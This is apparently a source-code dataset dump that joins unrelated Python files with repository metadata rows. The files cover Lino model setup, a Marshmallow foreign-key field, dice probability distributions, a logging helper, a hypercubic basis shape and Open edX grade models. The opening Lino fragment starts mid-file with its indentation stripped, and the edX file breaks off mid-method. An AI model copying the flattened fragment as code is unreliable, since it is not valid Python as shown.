#~ logger.info("Installing %s = %s" ,app_label,a)
for k,v in a.__dict__.items():
if isinstance(v,type) and issubclass(v,layouts.BaseLayout):
#~ print "%s.%s = %r" % (app_label,k,v)
self.modules.define(app_label,k,v)
#~ if isinstance(v,type) and issubclass(v,dd.Plugin):
#~ self.plugins.append(v)
#~ if isinstance(v,type) and issubclass(v,dd.Module):
#~ logger.info("20120128 Found module %s",v)
if k.startswith('setup_'):
self.modules.define(app_label,k,v)
self.setup_choicelists()
self.setup_workflows()
for model in models_list:
for f, m in model._meta.get_fields_with_model():
#~ if isinstance(f,models.CharField) and f.null:
if f.__class__ is models.CharField and f.null:
msg = "Nullable CharField %s in %s" % (f.name,model)
raise Exception(msg)
#~ if f.__class__ is models.CharField:
#~ raise Exception(msg)
#~ else:
#~ logger.info(msg)
elif isinstance(f,models.ForeignKey):
#~ f.rel.to = dd.resolve_model(f.rel.to,strict=True)
if isinstance(f.rel.to,basestring):
raise Exception("%s %s relates to %r (models are %s)" % (model,f.name,f.rel.to,models_list))
set_default_verbose_name(f)
"""
If JobProvider is an MTI child of Company,
then mti.delete_child(JobProvider) must not fail on a
JobProvider being refered only by objects that can refer
to a Company as well.
"""
if hasattr(f.rel.to,'_lino_ddh'):
#~ f.rel.to._lino_ddh.add_fk(model,f) # 20120728
f.rel.to._lino_ddh.add_fk(m or model,f)
dd.pre_analyze.send(self,models_list=models_list)
# MergeActions are defined in pre_analyze.
# And MergeAction needs the info in _lino_ddh to correctly find keep_volatiles
for model in models_list:
"""
Virtual fields declared on the model must have
been attached before calling Model.site_setup(),
e.g. because pcsw.Person.site_setup()
declares `is_client` as imported field.
"""
model.on_analyze(self)
for k,v in class_dict_items(model):
if isinstance(v,dd.VirtualField):
v.attach_to_model(model,k)
#~ logger.info("20130817 attached model vfs")
actors.discover()
actors.initialize()
dbtables.discover()
#~ choosers.discover()
actions.discover_choosers()
#~ from lino.core import ui
#~ ui.site_setup(self)
for a in actors.actors_list:
a.on_analyze(self)
#~ logger.info("20130121 GFK_LIST is %s",['%s.%s'%(full_model_name(f.model),f.name) for f in settings.SITE.GFK_LIST])
dd.post_analyze.send(self,models_list=models_list)
logger.info("Languages: %s. %d apps, %d models, %s actors.",
', '.join([li.django_code for li in self.languages]),
len(self.modules),
len(models_list),
len(actors.actors_list))
#~ logger.info(settings.INSTALLED_APPS)
self.on_each_app('site_setup')
"""
Actor.after_site_setup() is called after the apps' site_setup().
Example: pcsw.site_setup() adds a detail to properties.Properties,
the base class for properties.PropsByGroup.
The latter would not
install a `detail_action` during her after_site_setup()
and also would never get it later.
"""
for a in actors.actors_list:
a.after_site_setup(self)
#~ self.on_site_startup()
self.resolve_virtual_fields()
#~ logger.info("20130827 startup_site done")
class DisableDeleteHandler():
"""
Used to find out whether a known object can be deleted or not.
Lino's default behaviour is to forbit deletion if there is any other
object in the database that refers to this. To implement this,
Lino installs a DisableDeleteHandler instance on each model
during :func:`analyze_models`. In an attribute `_lino_ddh`.
"""
def __init__(self,model):
self.model = model
self.fklist = []
def add_fk(self,model,fk):
self.fklist.append((model,fk))
def __str__(self):
return ','.join([m.__name__+'.'+fk.name for m,fk in self.fklist])
def disable_delete_on_object(self,obj):
#~ print 20101104, "called %s.disable_delete(%s)" % (obj,self)
#~ h = getattr(self.model,'disable_delete',None)
#~ if h is not None:
#~ msg = h(obj,ar)
#~ if msg is not None:
#~ return msg
for m,fk in self.fklist:
#~ kw = {}
#~ kw[fk.name] = obj
#~ if not getattr(m,'allow_cascaded_delete',False):
if not fk.name in m.allow_cascaded_delete:
n = m.objects.filter(**{fk.name : obj}).count()
if n:
msg = _("Cannot delete %(self)s because %(count)d %(refs)s refer to it.") % dict(
self=obj,count=n,
refs=m._meta.verbose_name_plural or m._meta.verbose_name+'s')
#~ print msg
return msg
return None
def unused_generate_dummy_messages(self):
fn = os.path.join(self.source_dir,'dummy_messages.py')
self.dummy_messages
raise Exception("use write_message_file() instead!")
| gpl-3.0 | 7,710,695,352,416,538,000 | 34.567647 | 121 | 0.588193 | false |
croscon/fleaker | fleaker/marshmallow/fields/foreign_key.py | 1 | 2218 | # ~*~ coding: utf-8 ~*~
"""Module that defines a Marshmallow field for Peewee's foreign keys."""
from marshmallow import fields
from .mixin import FleakerFieldMixin
class ForeignKeyField(fields.Integer, FleakerFieldMixin):
"""Marshmallow field that can be used with Peewee's foreign key setup.
Turns a field named ``${relation_name}_id`` into ``${relation_name}`` on
load, and then back to ``${relation_name}_id`` on dump again.
This fixes a discrepancy between PeeWee and common API usage. Common API
usage for DB ID's is to name them ``${relation_name}_id``, for clarity.
However, PeeWee only accepts FK values set through ``${relation_name}``, so
fix it!
This field is effect by the following schema context variable:
- ``'convert_fks'``: This will prevent the field from being renamed when
serialized. This is useful if you will be double deserializing the data
and you don't wanted it converted after the first pass. This flow is
present for Webargs. By default, this field will rename the key when
deserialzed.
"""
def _jsonschema_type_mapping(self):
"""Define the JSON Schema type for this field."""
return {
'type': 'number',
'format': 'integer',
}
def _add_to_schema(self, field_name, schema):
"""Set the ``attribute`` attr to the field in question so this always
gets deserialzed into the field name without ``_id``.
Args:
field_name (str): The name of the field (the attribute name being
set in the schema).
schema (marshmallow.Schema): The actual parent schema this field
belongs to.
"""
super(ForeignKeyField, self)._add_to_schema(field_name, schema)
if self.get_field_value('convert_fks', default=True):
self.attribute = field_name.replace('_id', '')
def _serialize(self, value, attr, obj):
"""Grab the ID value off the Peewee model so we serialize an ID back.
"""
# this might be an optional field
if value:
value = value.id
return super(ForeignKeyField, self)._serialize(value, attr, obj)
| bsd-3-clause | -3,171,669,109,654,031,000 | 37.241379 | 79 | 0.638413 | false |
btbonval/DieStatistician | XdY.py | 1 | 5433 | '''
Bryan Bonvallet
2009
XdY is standard nomenclature for taking X dice with Y faces,
rolling them all, and adding the result. 'd' represents dice.
The class XdY is defined to create a probability mass function
for the result of rolling and adding X dice with Y faces.
'''
from PMF import *
class XdY(PMF,FiniteSequence):
''' Represents a discrete probability mass function
of adding up X dice with Y faces.
Allows direct sampling from the distribution, calculation of
statistics, and some more advanced probability distribution
arithmetic. '''
def __init__(self, description, error=None):
''' Instantiate a discrete PMF. Description is either [X, Y] or a
distribution.
X and Y are integers. X represents the number of dice, and Y
represents the number of faces on each die. '''
if error is not None:
self.error = error
self.description = description
self.setDistribution()
def setDistribution(self):
''' Updates the internal distribution using the internal error and
internal description. '''
description = self.description
try:
# Assume [X, Y] is provided:
if numpy.matrix(description).size == 2:
distribution = self.genDistribution(description[0],description[1])
else:
distribution = description
except:
# [X, Y] is not provided. Assume it is a distribution.
distribution = description
if not self.validateDistribution(distribution):
raise TypeError('Invalid distribution: %s. Input: %s' %(self.validationError, distribution))
self.distribution = self.castToDistribution(distribution)
def genDistribution(self, X, Y):
''' Generate the distribution for XdY using PMF intermediates. '''
# Must generate the base function of 1dY with uniform distribution.
values = range(1,Y+1)
probs = numpy.ones(Y) * 1.0/Y
basepmf = self.__class__([values,probs],self.error)
# Add the dice distributions together X times.
pmf = basepmf
for i in range(1,X):
pmf = pmf + basepmf
return pmf
def setError(self, error):
''' Sets the internal maximal error value as a singleton
real number specified by the argument error.
Then recalculates the distribution. '''
self.error = error
self.setDistribution()
def __radd__(self, other):
''' Reverse add acts just as normal add, but implies other
does not support adding. '''
return self + other
def __add__(self, other):
''' The probability distribution of the addition of two
independent random variables is the convolution of the
probability distribution functions of the random variables. '''
# First, make sure other can be compared properly.
if not self.validateDistribution(other):
raise TypeError('Invalid distribution for addition: %s' %(self.validationError))
# Find appropriate error value. Choose maximum if possible.
try:
if self.error > other.error:
error = self.error
else:
error = other.error
except:
error = self.error
# "cast" into a friendly format.
other = self.__class__(other,error)
# Setup values and probabilities to Convolve the PMFs.
inputAvalue = self.getDistribution(0)
inputBvalue = other.getDistribution(0)
inputAprob = self.getDistribution(1)
inputBprob = other.getDistribution(1)
leftside = numpy.min(inputBvalue) - numpy.min(inputAvalue)
if leftside > 0:
# B begins further "right" than A. Leftpad B with zeros.
inputBprob = numpy.concatenate((numpy.zeros(leftside),inputBprob),1)
if leftside < 0:
# B begins further "left" than A. Leftpad A with zeros.
inputAprob = numpy.concatenate((numpy.zeros(-1*leftside),inputAprob),1)
# Convolve the distributions.
outputprob = numpy.convolve(inputAprob, inputBprob)
# Either A or B may be left padded. The number of zeros padded
# to the input of convolution will be the number of zeros padded
# to the output. Skip the padding, but keep the rest.
outputprob = outputprob[numpy.abs(leftside):]
# Find the values for the associated convolution.
minoutputvalue = numpy.min(inputAvalue) + numpy.min(inputBvalue)
maxoutputvalue = minoutputvalue + len(self) + len(other) - 2
outputvalue = range(int(minoutputvalue),int(maxoutputvalue)+1)
return self.__class__(numpy.array([outputvalue, outputprob]),error)
# Some example code
if __name__ == "__main__":
print "Take one six-sided die and roll it. The distribution would be: "
six1 = XdY( (1,6) )
print str(six1)
print "Add two six-sided dice together: "
six2a = six1 + six1
print str(six2a)
print "Also add two six-sided dice together: "
six2b = XdY( (2,6) )
print str(six2b)
print "If heads is one and tails is two, sum of three coin flips: "
coin3 = XdY( (3,2) )
print str(coin3)
print "Three coin flips plus two six sided dice: "
mix = six2b + coin3
print str(mix)
print "Expected value from the above distribution: "
print mix.EV()
print "Take three samples from the above distribution: "
for i in range(0,3):
print mix.getSample()
| mit | 8,488,510,294,593,417,000 | 34.279221 | 103 | 0.652678 | false |
nsgomez/FBGroupCommentCounter | prettyprint.py | 1 | 1091 | colorAvailable = False
loglevel_colors = None
verbose = False
try:
import colorama
from colorama import Fore
colorama.init()
loglevel_colors = [Fore.RED, Fore.YELLOW, Fore.BLUE, Fore.MAGENTA]
colorAvailable = True
except:
pass
loglevel_sz = ["[!!]", "[??]", "[ii]", "[vv]"]
class Logging:
ERROR = 0
WARNING = 1
MESSAGE = 2
VERBOSE = 3
def getTracePrefix(loglevel = Logging.MESSAGE):
sz = ""
if colorAvailable:
sz += loglevel_colors[loglevel]
sz += loglevel_sz[loglevel]
if colorAvailable:
sz += Fore.RESET
sz += " "
return sz
def enableVerbosity():
global verbose
verbose = True
trace("Verbosity enabled")
# pprint a.k.a. prettyprint
def pprint(sz, loglevel = Logging.MESSAGE):
if loglevel is Logging.VERBOSE and verbose == False:
return
print(getTracePrefix(loglevel) + sz)
def trace(sz):
pprint(sz, Logging.VERBOSE)
def perror(sz):
pprint(sz, Logging.ERROR)
def pwarn(sz):
pprint(sz, Logging.WARNING)
def pinfo(sz):
pprint(sz, Logging.MESSAGE)
| mit | -8,068,261,839,044,515,000 | 16.046875 | 70 | 0.633364 | false |
WaveBlocks/WaveBlocksND | WaveBlocksND/HyperCubicShape.py | 1 | 9987 | """The WaveBlocks Project
This file contains the class for representing the hypercubic basis shape
which is the full dense basis set.
@author: R. Bourquin
@copyright: Copyright (C) 2012, 2013, 2014, 2015 R. Bourquin
@license: Modified BSD License
"""
from numpy import array, eye, vstack, integer
from WaveBlocksND.BasisShape import BasisShape
__all__ = ["HyperCubicShape"]
class HyperCubicShape(BasisShape):
r"""This class implements the hypercubic basis shape
which is the full dense basis set.
A basis shape is essentially all information and operations
related to the set :math:`\mathfrak{K}` of multi-indices :math:`k`.
The hypercubic shape in :math:`D` dimensions and with limit :math:`K_d`
in dimension :math:`d` is defined as the set
.. math::
\mathfrak{K}(D, K) := \{ (k_0, \ldots, k_{D-1}) \in \mathbb{N}_0^D |
k_d < K_d \forall d \in [0,\ldots,D-1] \}
"""
def __init__(self, limits):
r"""
:param limits: The list of all limits :math:`\{K_d\}_{d=0}^{D-1}`
"""
# The dimension of K
self._dimension = len(limits)
# The limits Ki for each axis
limits = tuple(limits)
if all([int(l) > 0 for l in limits]):
self._limits = limits
else:
raise ValueError("All limits have to be positive.")
# TODO: Do we really want to store these maps or better compute data on the fly
# The linear mapping k -> index for the basis
iil = self._get_index_iterator_lex()
self._lima = {k: index for index, k in enumerate(iil)}
# And the inverse mapping
self._lima_inv = {v: k for k, v in self._lima.items()}
# The basis size
self._basissize = len(self._lima)
def __str__(self):
r""":return: A string describing the basis shape :math:`\mathfrak{K}`.
"""
s = ("Hypercubic basis shape of dimension "+str(self._dimension)+" and with limits "+str(self._limits)+".")
return s
def __hash__(self):
r"""Compute a unique hash for the basis shape. In the case of hypercubic
basis shapes :math:`\mathfrak{K}` the basis is fully specified by its
maximal index :math:`K_i` along each direction :math:`i \in [0,\ldots,D-1]`.
"""
return hash(("HyperCubicShape", self._limits))
def __getitem__(self, k):
r"""Make map look ups.
"""
if type(k) is tuple or type(k) is list:
k = tuple(k)
assert len(k) == self._dimension
if k in self._lima:
return self._lima[k]
elif type(k) is int:
if k in self._lima_inv:
return self._lima_inv[k]
else:
raise IndexError("Wrong index type")
def __contains__(self, k):
r"""
Checks if a given multi-index :math:`k` is part of the basis set :math:`\mathfrak{K}`.
:param k: The multi-index we want to test.
:type k: tuple
"""
assert len(tuple(k)) == self._dimension
return tuple(k) in self._lima
def __iter__(self):
r"""Implements iteration over the multi-indices :math:`k`
of the basis set :math:`\mathfrak{K}`.
Note: The order of iteration is NOT fixed. If you need a special
iteration scheme, use :py:meth:`get_node_iterator`.
"""
# TODO: Better remove this as it may cause unexpected behaviour?
return iter(self._lima)
def contains(self, k):
r"""
Checks if a given multi-index :math:`k` is part of the basis set :math:`\mathfrak{K}`.
:param k: The multi-index we want to test.
:type k: tuple
"""
return tuple(k) in self._lima
def get_description(self):
r"""Return a description of this basis shape object.
A description is a ``dict`` containing all key-value pairs
necessary to reconstruct the current basis shape. A description
never contains any data.
"""
d = {}
d["type"] = "HyperCubicShape"
d["limits"] = self._limits
return d
def extend(self):
r"""Extend the basis shape such that (at least) all neighbours of all
boundary nodes are included in the extended basis shape.
"""
extended_limits = [l + 1 for l in self._limits]
return HyperCubicShape(extended_limits)
def _get_index_iterator_lex(self):
r"""
"""
# Upper bounds in each dimension
bounds = self._limits[::-1]
def index_iterator_lex(bounds):
# Initialize a counter
z = [0 for i in range(self._dimension + 1)]
while z[self._dimension] == 0:
# Yield the current index vector
yield tuple(reversed(z[:-1]))
# Increment fastest varying bit
z[0] += 1
# Reset overflows
for d in range(self._dimension):
if z[d] >= bounds[d]:
z[d] = 0
z[d + 1] += 1
return index_iterator_lex(bounds)
def _get_index_iterator_chain(self, direction=0):
r"""
"""
def index_iterator_chain(d):
# Number of functions in each dimension
bounds = self._limits[:]
# The counter
z = [0 for i in range(self._dimension + 1)]
# Iterate over all valid stencil points
while not z[-1] > 0:
# Otherwise we would yield k = (0,...,0) for limits = [1,...,1]
if not z[d] > bounds[d] - 2:
yield tuple(z[:-1])
# Increase index in the dimension we build the chain
z[d] += 1
# Check if we are done with the current base point
# If yes, move base point and start a new chain
if z[d] > bounds[d] - 2:
z[d] = 0
z[d - 1] += 1
for i in reversed(range(d)):
if z[i] > bounds[i] - 1:
z[i] = 0
z[i - 1] += 1
return index_iterator_chain(direction)
def _get_index_iterator_mag(self):
r"""
"""
# Nodes sorted by l_1 magnitude
nodes = sorted(self._lima.keys(), key=sum)
def index_iterator_mag(nodes):
for node in nodes:
yield node
return index_iterator_mag(nodes)
def get_node_iterator(self, mode="lex", direction=None):
r"""
Returns an iterator to iterate over all basis elements :math:`k`.
:param mode: The mode by which we iterate over the indices. Default is 'lex'
for lexicographical order. Supported is also 'chain', for
the chain-like mode, details see the manual.
:type mode: string
:param direction: If iterating in `chainmode` this specifies the direction
the chains go.
:type direction: integer.
"""
if mode == "lex":
return self._get_index_iterator_lex()
elif mode == "chain":
if direction < self._dimension:
return self._get_index_iterator_chain(direction=direction)
else:
raise ValueError("Can not build chain iterator for this direction.")
elif mode == "mag":
return self._get_index_iterator_mag()
# TODO: Consider boundary node only iterator
else:
raise ValueError("Unknown iterator mode: {}.".format(mode))
def get_limits(self):
r"""Returns the upper limit :math:`K_d` for all directions :math:`d`.
:return: A tuple of the maximum of the multi-index in each direction.
"""
return tuple(self._limits)
def get_neighbours(self, k, selection=None, direction=None):
r"""
Returns a list of all multi-indices that are neighbours of a given
multi-index :math:`k`. A direct neighbour is defined as
:math:`(k_0, \ldots, k_d \pm 1, \ldots, k_{D-1}) \forall d \in [0 \ldots D-1]`.
:param k: The multi-index of which we want to get the neighbours.
:type k: tuple
:param selection:
:type selection: string with fixed values ``forward``, ``backward`` or ``all``.
The values ``all`` is equivalent to the value ``None`` (default).
:param direction: The direction :math:`0 \leq d < D` in which we want to find
the neighbours :math:`k \pm e_d`.
:type direction: int
:return: A list containing the pairs :math:`(d, k^\prime)`.
"""
assert len(tuple(k)) == self._dimension
# First build a list of potential neighbours
I = eye(self._dimension, dtype=integer)
ki = vstack(k)
# Forward and backward direct neighbours
nbfw = ki + I
nbbw = ki - I
# Keep only the valid ones
nbh = []
if direction is not None:
directions = [direction]
else:
directions = range(self._dimension)
for d in directions:
nfw = tuple(nbfw[:, d])
nbw = tuple(nbbw[:, d])
# TODO: Try to simplify these nested if blocks
if selection in ("backward", "all", None):
if nbw in self:
nbh.append((d, nbw))
if selection in ("forward", "all", None):
if nfw in self:
nbh.append((d, nfw))
return nbh
def find_largest_index(self):
r"""
Find the index :math:`k \in \mathfrak{K}` with maximal distance
:math:`\sum_{d=0}^D k_d^2` from the zero index. In case of
multiple maxima the method returns the first one found.
"""
return tuple(array(self._limits) - 1)
| bsd-3-clause | 7,798,054,498,354,863,000 | 32.29 | 115 | 0.542105 | false |
stvstnfrd/edx-platform | lms/djangoapps/grades/models.py | 1 | 30802 | """
Models used for robust grading.
Robust grading allows student scores to be saved per-subsection independent
of any changes that may occur to the course after the score is achieved.
We also persist students' course-level grades, and update them whenever
a student's score or the course grading policy changes. As they are
persisted, course grades are also immune to changes in course content.
"""
import json
import logging
from base64 import b64encode
from collections import defaultdict, namedtuple
from hashlib import sha1
from django.apps import apps
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user, unused-import
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now
from lazy import lazy
from model_utils.models import TimeStampedModel
from opaque_keys.edx.django.models import CourseKeyField, UsageKeyField
from opaque_keys.edx.keys import CourseKey, UsageKey
from simple_history.models import HistoricalRecords
from lms.djangoapps.courseware.fields import UnsignedBigIntAutoField
from lms.djangoapps.grades import constants, events # lint-amnesty, pylint: disable=unused-import
from openedx.core.lib.cache_utils import get_cache
log = logging.getLogger(__name__)
BLOCK_RECORD_LIST_VERSION = 1
# Used to serialize information about a block at the time it was used in
# grade calculation.
BlockRecord = namedtuple('BlockRecord', ['locator', 'weight', 'raw_possible', 'graded'])
class BlockRecordList:
"""
An immutable ordered list of BlockRecord objects.
"""
def __init__(self, blocks, course_key, version=None):
self.blocks = tuple(blocks)
self.course_key = course_key
self.version = version or BLOCK_RECORD_LIST_VERSION
def __eq__(self, other):
assert isinstance(other, BlockRecordList)
return self.json_value == other.json_value
def __hash__(self):
"""
Returns an integer Type value of the hash of this
list of block records, as required by python.
"""
return hash(self.hash_value)
def __iter__(self):
return iter(self.blocks)
def __len__(self):
return len(self.blocks)
@lazy
def hash_value(self):
"""
Returns a hash value of the list of block records.
This currently hashes using sha1, and returns a base64 encoded version
of the binary digest. In the future, different algorithms could be
supported by adding a label indicated which algorithm was used, e.g.,
"sha256$j0NDRmSPa5bfid2pAcUXaxCm2Dlh3TwayItZstwyeqQ=".
"""
return b64encode(sha1(self.json_value.encode('utf-8')).digest()).decode('utf-8')
@lazy
def json_value(self):
"""
Return a JSON-serialized version of the list of block records, using a
stable ordering.
"""
list_of_block_dicts = [block._asdict() for block in self.blocks]
for block_dict in list_of_block_dicts:
block_dict['locator'] = str(block_dict['locator']) # BlockUsageLocator is not json-serializable
data = {
'blocks': list_of_block_dicts,
'course_key': str(self.course_key),
'version': self.version,
}
return json.dumps(
data,
separators=(',', ':'), # Remove spaces from separators for more compact representation
sort_keys=True,
)
@classmethod
def from_json(cls, blockrecord_json):
"""
Return a BlockRecordList from previously serialized json.
"""
data = json.loads(blockrecord_json)
course_key = CourseKey.from_string(data['course_key'])
block_dicts = data['blocks']
record_generator = (
BlockRecord(
locator=UsageKey.from_string(block["locator"]).replace(course_key=course_key),
weight=block["weight"],
raw_possible=block["raw_possible"],
graded=block["graded"],
)
for block in block_dicts
)
return cls(record_generator, course_key, version=data['version'])
@classmethod
def from_list(cls, blocks, course_key):
"""
Return a BlockRecordList from the given list and course_key.
"""
return cls(blocks, course_key)
@python_2_unicode_compatible
class VisibleBlocks(models.Model):
"""
A django model used to track the state of a set of visible blocks under a
given subsection at the time they are used for grade calculation.
This state is represented using an array of BlockRecord, stored
in the blocks_json field. A hash of this json array is used for lookup
purposes.
.. no_pii:
"""
blocks_json = models.TextField()
hashed = models.CharField(max_length=100, unique=True)
course_id = CourseKeyField(blank=False, max_length=255, db_index=True)
_CACHE_NAMESPACE = "grades.models.VisibleBlocks"
class Meta:
app_label = "grades"
def __str__(self):
"""
String representation of this model.
"""
return f"VisibleBlocks object - hash:{self.hashed}, raw json:'{self.blocks_json}'"
@property
def blocks(self):
"""
Returns the blocks_json data stored on this model as a list of
BlockRecords in the order they were provided.
"""
return BlockRecordList.from_json(self.blocks_json)
@classmethod
def bulk_read(cls, user_id, course_key):
"""
Reads and returns all visible block records for the given user and course from
the cache. The cache is initialized with the visible blocks for this user and
course if no entry currently exists.
Arguments:
course_key: The course identifier for the desired records
"""
prefetched = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(user_id, course_key), None)
if prefetched is None:
prefetched = cls._initialize_cache(user_id, course_key)
return prefetched
@classmethod
def cached_get_or_create(cls, user_id, blocks):
"""
Given a ``user_id`` and a ``BlockRecordList`` object, attempts to
fetch the related VisibleBlocks model from the request cache. This
will create and save a new ``VisibleBlocks`` record if no record
exists corresponding to the hash_value of ``blocks``.
"""
prefetched = get_cache(cls._CACHE_NAMESPACE).get(cls._cache_key(user_id, blocks.course_key))
if prefetched is not None:
model = prefetched.get(blocks.hash_value)
if not model:
# We still have to do a get_or_create, because
# another user may have had this block hash created,
# even if the user we checked the cache for hasn't yet.
model, _ = cls.objects.get_or_create(
hashed=blocks.hash_value, blocks_json=blocks.json_value, course_id=blocks.course_key,
)
cls._update_cache(user_id, blocks.course_key, [model])
else:
model, _ = cls.objects.get_or_create(
hashed=blocks.hash_value,
defaults={'blocks_json': blocks.json_value, 'course_id': blocks.course_key},
)
return model
@classmethod
def bulk_create(cls, user_id, course_key, block_record_lists):
"""
Bulk creates VisibleBlocks for the given iterator of
BlockRecordList objects and updates the VisibleBlocks cache
for the block records' course with the new VisibleBlocks.
Returns the newly created visible blocks.
"""
created = cls.objects.bulk_create([
VisibleBlocks(
blocks_json=brl.json_value,
hashed=brl.hash_value,
course_id=course_key,
)
for brl in block_record_lists
])
cls._update_cache(user_id, course_key, created)
return created
@classmethod
def bulk_get_or_create(cls, user_id, course_key, block_record_lists):
"""
Bulk creates VisibleBlocks for the given iterator of
BlockRecordList objects for the given user and course_key, but
only for those that aren't already created.
"""
cached_records = cls.bulk_read(user_id, course_key)
non_existent_brls = {brl for brl in block_record_lists if brl.hash_value not in cached_records}
cls.bulk_create(user_id, course_key, non_existent_brls)
@classmethod
def _initialize_cache(cls, user_id, course_key):
"""
Prefetches visible blocks for the given user and course and stores in the cache.
Returns a dictionary mapping hashes of these block records to the
block record objects.
"""
grades_with_blocks = PersistentSubsectionGrade.objects.select_related('visible_blocks').filter(
user_id=user_id,
course_id=course_key,
)
prefetched = {grade.visible_blocks.hashed: grade.visible_blocks for grade in grades_with_blocks}
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(user_id, course_key)] = prefetched
return prefetched
@classmethod
def _update_cache(cls, user_id, course_key, visible_blocks):
"""
Adds a specific set of visible blocks to the request cache.
This assumes that prefetch has already been called.
"""
get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(user_id, course_key)].update(
{visible_block.hashed: visible_block for visible_block in visible_blocks}
)
@classmethod
def _cache_key(cls, user_id, course_key):
return f"visible_blocks_cache.{course_key}.{user_id}"
@python_2_unicode_compatible
class PersistentSubsectionGrade(TimeStampedModel):
"""
A django model tracking persistent grades at the subsection level.
.. no_pii:
"""
class Meta:
app_label = "grades"
unique_together = [
# * Specific grades can be pulled using all three columns,
# * Progress page can pull all grades for a given (course_id, user_id)
# * Course staff can see all grades for a course using (course_id,)
('course_id', 'user_id', 'usage_key'),
]
# Allows querying in the following ways:
# (modified): find all the grades updated within a certain timespan
# (modified, course_id): find all the grades updated within a timespan for a certain course
# (modified, course_id, usage_key): find all the grades updated within a timespan for a subsection
# in a course
# (first_attempted, course_id, user_id): find all attempted subsections in a course for a user
# (first_attempted, course_id): find all attempted subsections in a course for all users
index_together = [
('modified', 'course_id', 'usage_key'),
('first_attempted', 'course_id', 'user_id')
]
# primary key will need to be large for this table
id = UnsignedBigIntAutoField(primary_key=True) # pylint: disable=invalid-name
user_id = models.IntegerField(blank=False)
course_id = CourseKeyField(blank=False, max_length=255)
# note: the usage_key may not have the run filled in for
# old mongo courses. Use the full_usage_key property
# instead when you want to use/compare the usage_key.
usage_key = UsageKeyField(blank=False, max_length=255)
# Information relating to the state of content when grade was calculated
subtree_edited_timestamp = models.DateTimeField('Last content edit timestamp', blank=True, null=True)
course_version = models.CharField('Guid of latest course version', blank=True, max_length=255)
# earned/possible refers to the number of points achieved and available to achieve.
# graded refers to the subset of all problems that are marked as being graded.
earned_all = models.FloatField(blank=False)
possible_all = models.FloatField(blank=False)
earned_graded = models.FloatField(blank=False)
possible_graded = models.FloatField(blank=False)
# timestamp for the learner's first attempt at content in
# this subsection. If null, indicates no attempt
# has yet been made.
first_attempted = models.DateTimeField(null=True, blank=True)
# track which blocks were visible at the time of grade calculation
visible_blocks = models.ForeignKey(VisibleBlocks, db_column='visible_blocks_hash', to_field='hashed',
on_delete=models.CASCADE)
_CACHE_NAMESPACE = 'grades.models.PersistentSubsectionGrade'
@property
def full_usage_key(self):
"""
Returns the "correct" usage key value with the run filled in.
"""
if self.usage_key.run is None: # lint-amnesty, pylint: disable=no-member
# pylint: disable=unexpected-keyword-arg,no-value-for-parameter
return self.usage_key.replace(course_key=self.course_id)
else:
return self.usage_key
def __str__(self):
"""
Returns a string representation of this model.
"""
return (
"{} user: {}, course version: {}, subsection: {} ({}). {}/{} graded, {}/{} all, first_attempted: {}"
).format(
type(self).__name__,
self.user_id,
self.course_version,
self.usage_key,
self.visible_blocks_id,
self.earned_graded,
self.possible_graded,
self.earned_all,
self.possible_all,
self.first_attempted,
)
@classmethod
def prefetch(cls, course_key, users):
"""
Prefetches grades for the given users in the given course.
"""
cache_key = cls._cache_key(course_key)
get_cache(cls._CACHE_NAMESPACE)[cache_key] = defaultdict(list)
cached_grades = get_cache(cls._CACHE_NAMESPACE)[cache_key]
queryset = cls.objects.select_related('visible_blocks', 'override').filter(
user_id__in=[user.id for user in users],
course_id=course_key,
)
for record in queryset:
cached_grades[record.user_id].append(record)
@classmethod
def clear_prefetched_data(cls, course_key):
"""
Clears prefetched grades for this course from the RequestCache.
"""
get_cache(cls._CACHE_NAMESPACE).pop(cls._cache_key(course_key), None)
@classmethod
def read_grade(cls, user_id, usage_key):
"""
Reads a grade from database
Arguments:
user_id: The user associated with the desired grade
usage_key: The location of the subsection associated with the desired grade
Raises PersistentSubsectionGrade.DoesNotExist if applicable
"""
return cls.objects.select_related('visible_blocks', 'override').get(
user_id=user_id,
course_id=usage_key.course_key, # course_id is included to take advantage of db indexes
usage_key=usage_key,
)
@classmethod
def bulk_read_grades(cls, user_id, course_key):
"""
Reads all grades for the given user and course.
Arguments:
user_id: The user associated with the desired grades
course_key: The course identifier for the desired grades
"""
try:
prefetched_grades = get_cache(cls._CACHE_NAMESPACE)[cls._cache_key(course_key)]
try:
return prefetched_grades[user_id]
except KeyError:
# The user's grade is not in the cached dict of subsection grades,
# so return an empty list.
return []
except KeyError:
# subsection grades were not prefetched for the course, so get them from the DB
return cls.objects.select_related('visible_blocks', 'override').filter(
user_id=user_id,
course_id=course_key,
)
@classmethod
def update_or_create_grade(cls, **params):
"""
Wrapper for objects.update_or_create.
"""
cls._prepare_params(params)
VisibleBlocks.cached_get_or_create(params['user_id'], params['visible_blocks'])
cls._prepare_params_visible_blocks_id(params)
# TODO: do we NEED to pop these?
first_attempted = params.pop('first_attempted')
user_id = params.pop('user_id')
usage_key = params.pop('usage_key')
grade, _ = cls.objects.update_or_create(
user_id=user_id,
course_id=usage_key.course_key,
usage_key=usage_key,
defaults=params,
)
# TODO: Remove as part of EDUCATOR-4602.
if str(usage_key.course_key) == 'course-v1:UQx+BUSLEAD5x+2T2019':
log.info('Created/updated grade ***{}*** for user ***{}*** in course ***{}***'
'for subsection ***{}*** with default params ***{}***'
.format(grade, user_id, usage_key.course_key, usage_key, params))
grade.override = PersistentSubsectionGradeOverride.get_override(user_id, usage_key)
if first_attempted is not None and grade.first_attempted is None:
grade.first_attempted = first_attempted
grade.save()
cls._emit_grade_calculated_event(grade)
return grade
@classmethod
def bulk_create_grades(cls, grade_params_iter, user_id, course_key):
"""
Bulk creation of grades.
"""
if not grade_params_iter:
return
PersistentSubsectionGradeOverride.prefetch(user_id, course_key)
list(map(cls._prepare_params, grade_params_iter))
VisibleBlocks.bulk_get_or_create(
user_id, course_key, [params['visible_blocks'] for params in grade_params_iter]
)
list(map(cls._prepare_params_visible_blocks_id, grade_params_iter))
grades = [PersistentSubsectionGrade(**params) for params in grade_params_iter]
grades = cls.objects.bulk_create(grades)
for grade in grades:
cls._emit_grade_calculated_event(grade)
return grades
@classmethod
def _prepare_params(cls, params):
"""
Prepares the fields for the grade record.
"""
if not params.get('course_id', None):
params['course_id'] = params['usage_key'].course_key
params['course_version'] = params.get('course_version', None) or ""
